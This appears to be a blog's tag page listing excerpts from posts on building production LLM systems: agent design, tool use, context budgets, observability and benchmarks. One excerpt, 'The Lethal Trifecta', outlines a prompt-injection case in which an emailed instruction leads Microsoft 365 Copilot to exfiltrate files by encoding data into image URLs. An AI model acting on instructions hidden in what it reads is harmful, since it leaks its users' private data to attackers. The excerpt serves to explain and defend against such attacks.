Skip to main content

83 posts tagged with "llm"

View all tags

Why Your Agent Should Write Code, Not JSON

· 10 min read
Tian Pan
Software Engineer

Most agent frameworks default to the same action model: the LLM emits a JSON blob, the host system parses it, calls a tool, returns the result. Repeat. It's clean, auditable, and almost universally used — which is exactly the problem. For anything beyond a single tool call, this architecture forces you to write scaffolding code that solves problems the agent could solve itself, if only it were allowed to write code.

There's a different approach: give the agent a Python interpreter and let it emit executable code as its action. One published benchmark shows a 20% higher task success rate over JSON tool-calling. An internal benchmark shows 30% fewer LLM round-trips on average. A framework built around this idea hit #1 on the GAIA leaderboard (44.2% on validation) shortly after release. The tradeoff is a more complex execution environment — but the engineering required is tractable, and the behavioral gains are real.

Why Your AI Agent Wastes Most of Its Context Window on Tools

· 10 min read
Tian Pan
Software Engineer

You connect your agent to 50 MCP tools. It can query databases, call APIs, read files, send emails, browse the web. On paper, it has everything it needs. In practice, half your production incidents trace back to tool use—wrong parameters, blown context budgets, cascading retry loops that cost ten times what you expected.

Here's the part most tutorials skip: every tool definition you load is a token tax paid upfront, before the agent processes a single user message. With 50+ tools connected, definitions alone can consume 70,000–130,000 tokens per request. That's not a corner case—it's the default state of any agent connected to multiple MCP servers.

Why Multi-Agent AI Architectures Keep Failing (and What to Build Instead)

· 8 min read
Tian Pan
Software Engineer

Most teams that build multi-agent systems hit the same wall: the thing works in demos and falls apart in production. Not because they implemented the coordination protocol wrong. Because the protocol itself is the problem.

Multi-agent AI has an intuitive appeal. Complex tasks should be broken into parallel workstreams. Specialized agents should handle specialized work. The orchestrator ties it together and the whole becomes greater than the sum of its parts. This intuition is wrong — or more precisely, it's premature. The practical failure rates of multi-agent systems in production range from 41% to 86.7% across studied execution traces. That's not a tuning problem. That's a structural one.

Building a Generative AI Platform: Architecture, Trade-offs, and the Components That Actually Matter

· 12 min read
Tian Pan
Software Engineer

Most teams treating their GenAI stack as a model integration project eventually discover they've actually built—or need to build—a platform. The model is the easy part. The hard part is everything around it: routing queries to the right model, retrieving context reliably, filtering unsafe outputs, caching redundant calls, tracing what went wrong in a chain of five LLM calls, and keeping costs from tripling month-over-month as usage scales.

This article is about that platform layer. Not the model weights, not the prompts—the surrounding infrastructure that separates a working proof of concept from something you'd trust to serve a million users.

12-Factor Agents: A Framework for Building AI Systems That Actually Ship

· 11 min read
Tian Pan
Software Engineer

The teams actually shipping reliable AI agents to production customers are mostly not using agent frameworks. They rolled their own.

That observation, surfaced from conversations with 100+ technical founders, is the uncomfortable starting point for the 12-Factor Agents framework — a manifesto for building LLM-powered software that reaches production instead of languishing at 80% quality forever. The framework is named deliberately after the original 12-Factor App methodology that shaped a generation of web services. The analogy holds: just as the 12-factor app gave teams a principled approach to building deployable web services, 12-factor agents provides the principles for building reliable, observable AI systems.

The 19,000-star GitHub repository documents what the best-performing production teams figured out independently. Here is what they know.

The Lethal Trifecta: Why Your AI Agent Is One Email Away from a Data Breach

· 9 min read
Tian Pan
Software Engineer

In June 2025, a researcher sent a carefully crafted email to a Microsoft 365 Copilot user. No link was clicked. No attachment opened. The email arrived, Copilot read it during a routine summarization task, and within seconds the AI began exfiltrating files from OneDrive, SharePoint, and Teams — silently transmitting contents to an attacker-controlled server by encoding data into image URLs it asked to "render." The victim never knew it happened.

This wasn't a novel zero-day in the traditional sense. There was no buffer overflow, no SQL injection. The vulnerability was architectural: the system combined three capabilities that, individually, seem like obvious product features. Together, they form what's now called the Lethal Trifecta.

LLM Observability in Production: Tracing What You Can't Predict

· 10 min read
Tian Pan
Software Engineer

Your monitoring stack tells you everything about request rates, CPU, and database latency. It tells you almost nothing about whether your LLM just hallucinated a refund policy, why a customer-facing agent looped through three tool calls to answer a simple question, or which feature in your product is quietly burning $800 a day in tokens.

Traditional observability was built around deterministic systems. LLMs are structurally different — same input, different output, every time. The failure mode isn't a 500 error or a timeout; it's a confident, plausible-sounding answer that happens to be wrong. The cost isn't steady and predictable; it spikes when a single misconfigured prompt hits a traffic wave. Debugging isn't "find the exception in the stack trace"; it's "reconstruct why the agent chose this tool path at 2 AM on Tuesday."

This is the problem LLM observability solves — and the discipline has matured significantly over the past 18 months.

The Hidden Costs of Context: Managing Token Budgets in Production LLM Systems

· 9 min read
Tian Pan
Software Engineer

Most teams shipping LLM applications for the first time make the same mistake: they treat context windows as free storage. The model supports 128K tokens? Great, pack it full. The model supports 1M tokens? Even better — dump everything in. What follows is a billing shock that arrives about three weeks before the product actually works well.

Context is not free. It's not even cheap. And beyond cost, blindly filling a context window actively makes your model worse. A focused 300-token context frequently outperforms an unfocused 113,000-token context. This is not an edge case — it's a documented failure mode with a name: "lost in the middle." Managing context well is one of the highest-leverage engineering decisions you'll make on an LLM product.

Structured Output in Production: Getting LLMs to Return Reliable JSON

· 8 min read
Tian Pan
Software Engineer

At some point in production, every LLM-powered application needs to stop treating model output as prose and start treating it as data. The moment you try to reliably extract a JSON object from a language model — and feed it downstream into a database, API call, or UI — you discover just how many ways this can go wrong. The model wraps JSON in markdown fences. It generates a valid object but omits required fields. It formats dates inconsistently across calls. It hallucinates enum values. Any one of these failures silently corrupts downstream state.

Structured output has evolved from an afterthought into a first-class concern for production LLM systems. This post covers the three main mechanisms for enforcing it, where each breaks down, and how to design schemas that keep quality high under constraint.

Prompt Engineering Deep Dive: From Basics to Advanced Techniques

· 10 min read
Tian Pan
Software Engineer

Most engineers treat prompts as magic words — tweak a phrase, hope it works, move on. That works fine for demos. In production, it produces a system where nobody knows why the model behaves differently on Tuesday than on Monday, and where a routine model update silently breaks three features. Prompt engineering done right is a discipline, not a ritual. This post covers the full stack: when to use each technique, what the benchmarks actually show, and where the traps are.

What AI Benchmarks Actually Measure (And Why You Shouldn't Trust the Leaderboard)

· 10 min read
Tian Pan
Software Engineer

When GPT-4o, Claude 3.5 Sonnet, and Llama 3.1 405B all score 88–93% on MMLU, what does that number actually tell you about which model to deploy? The uncomfortable answer: almost nothing. The benchmark that once separated capable models from mediocre ones has saturated. Every frontier model aces it, yet they behave very differently in production. The gap between benchmark performance and real-world utility has never been wider, and understanding why is now essential for any engineer building on top of LLMs.

Benchmarks feel rigorous because they produce numbers. A number looks like measurement, and measurement looks like truth. But the legitimacy of a benchmark score depends entirely on the validity of what it's measuring—and that validity breaks down in ways that are rarely surfaced on leaderboards.

Tool Calling in Production: The Loop, the Pitfalls, and What Actually Works

· 9 min read
Tian Pan
Software Engineer

The first time your agent silently retries the same broken tool call three times before giving up, you realize that "just add tools" is not a production strategy. Tool calling unlocks genuine capabilities — external data, side effects, guaranteed-shape outputs — but the agentic loop that makes it work has sharp edges that don't show up in demos.

This post is about those edges: how the loop actually runs, the formatting rules that quietly destroy parallel execution, how to write tool descriptions that make the model choose correctly, and how to handle errors in a way that lets the model recover instead of spiral.